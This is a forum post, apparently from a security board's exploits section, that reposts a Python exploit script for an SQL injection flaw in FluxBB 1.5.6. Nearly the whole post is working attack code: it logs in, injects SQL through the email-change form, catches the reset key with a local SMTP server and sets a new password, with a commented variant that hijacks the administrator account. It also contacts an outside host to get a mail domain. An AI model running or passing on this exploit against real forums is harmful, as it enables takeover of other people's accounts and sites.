Jump to content
Nytro

FluxBB 1.5.6 SQL Injection Exploit

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=2]FluxBB 1.5.6 SQL Injection Exploit[/h]

#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway@safe-mail.net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable

url = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd = 'test'

import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen

ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
Safari/537.36"
bindip = '0.0.0.0'

def stage1(sql):
if len(sql) > 80:
sys.exit('SQL too long, max 80 chars')
print "1st stage: %s (%d chars)" % (sql, len(sql))
r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid),
data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd),
headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie":
cookie})).read()
if 'An email has been sent to the specified address' not in r:
sys.exit('err')

def stage3(key):
print "3rd stage, using key: %s" % key
r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key),
headers={"User-agent": ua})).read()
if 'Your password has been updated' in r:
print 'success'
else:
print 'err'

class stage2_smtp(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
key = re.search("(https?://.*&key=([^\s]+))", message_from_string(data).get_payload(decode=True),
re.MULTILINE)
if key is not None:
raise asyncore.ExitNow(key.group(2))
return

def login():
print "logging in"
r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s"
% (user, pwd), headers={"User-agent": ua}))
try:
t = r.info()['set-cookie'].split(';')[0]
return (t.split('=')[1].split('%7C')[0], t)
except:
sys.exit('unable to login, check user/pass')

uid, cookie = login()

email_domain = urlopen(Request('http://tns.re/gen')).read()
print "using domain: %s" % email_domain

#this will change your password to your password 
stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new(pwd).hexdigest(), uid, email_domain))

#this will change admin's (uid=2) password "123456"
#stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new("123456").hexdigest(), 2, email_domain))

try:
print "2nd stage: waiting for mail"
server = stage2_smtp((bindip, 25), None)
asyncore.loop()
except asyncore.ExitNow, key:
stage3(key)

# FD4AFB8D7547D584   1337day.com [2014-11-26]   F29AD4CCFFC313CB #

Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...